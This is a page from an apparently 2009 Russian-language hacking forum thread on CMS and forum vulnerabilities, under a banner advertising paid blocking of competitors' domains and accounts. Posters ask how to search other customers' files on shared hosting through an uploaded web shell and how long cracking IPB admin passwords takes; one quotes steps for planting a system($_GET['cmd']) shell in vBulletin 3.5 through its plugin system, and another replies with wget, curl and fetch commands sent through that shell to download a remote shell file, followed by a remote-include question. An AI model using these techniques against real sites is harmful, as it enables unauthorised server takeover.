[Задай Вопрос - Получи Ответ]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
[Задай Вопрос - Получи Ответ]

Страница 18 из 32

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

15.03.2009, 16:51

kile2005

Новичок

Регистрация: 04.03.2009

Сообщений: 2

С нами: 9045747

Репутация: 0

Цитата:

Был удивлён, что про это ещё не писали.. Т.е. я ща спалю приват-фишку =) Идём на фрихост, смело регимся там, заливаем шелл на фтп. Ищем по всем ресурсам файлы с расширением ......
Источник: www.antichat.ru

Не подскажите где поподробней прочитать про этот метод поиска файлов на хосте?

я зарегился на фрихосте,залил шелл к себе на хост,запускаю в нем поиск, как описано выше, ищет только у меня на ресурсе. Как сделать поиск определенного файла по всем ресурсам хоста? Что я делаю не так?
P.S.у файлов которые нужно найти права доступа 777 или 755 и они точно находятся гдето на том же хосте где и мой ресурс,

𝕏 Twitter Reddit Telegram Копировать ссылку

14.03.2009, 12:48

inc

Новичок

Регистрация: 13.03.2009

Сообщений: 23

С нами: 9033052

Репутация: 5

ну новый часто не выполняется,прав чтоли не хватает,а если заменить то все ок

16.03.2009, 20:49

missy

Новичок

Регистрация: 15.03.2009

Сообщений: 1

С нами: 9031216

Репутация: 0

извините , если этот вопрос уже когда то задавали...

Сколько времени уходит у знающего человека (мастера) на вскрытие пароля админа на старых форумах IPB ,форумах без всяких там особенных защит и серьезных людей ?

17.03.2009, 13:11

GrinGoO

Участник форума

Регистрация: 01.07.2008

Сообщений: 172

С нами: 9401011

Репутация: 258

Цитата:

Времени по разному может уходить. Никогда нельзя сказать точно. Смотря какой форум, какие там есть известные баги и сматря какое умственное развитие у руководства форума

02.04.2009, 04:07

superalex

Новичок

Регистрация: 01.04.2009

Сообщений: 1

С нами: 9006036

Репутация: 0

Здравствуйте !!!
Какой на данный момент какой самый безопасный форум ? не важно платный либо бесплатный , желательно также с авто обновлением !!!
что думаете о ipb последней версии?

Последний раз редактировалось superalex; 02.04.2009 в 04:27..

02.04.2009, 09:48

dyx

Познающий

Регистрация: 05.04.2005

Сообщений: 46

С нами: 11104341

Репутация: 1

Цитата:

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Как через этот шел залить файл на сервер???

02.04.2009, 09:54

laedafess

Познающий

Регистрация: 11.02.2009

Сообщений: 98

С нами: 9076508

Репутация: 169

Код:

www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php

Код:

www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php

Код:

www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php

03.04.2009, 08:00

dyx

Познающий

Регистрация: 05.04.2005

Сообщений: 46

С нами: 11104341

Репутация: 1

Цитата:

Сообщение от laedafess

Код:

www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php

Код:

www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php

Код:

www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php

Косяк...

Файл создается на сервере, но пустой, как туда код то запихнуть???

и еще

на сервере включен
allow_url_fopen On On

если это вставить
<? include('http://путь_к_шеллу_.php') ?>

что будет??? как вызвать сам шелл

Последний раз редактировалось dyx; 03.04.2009 в 08:07..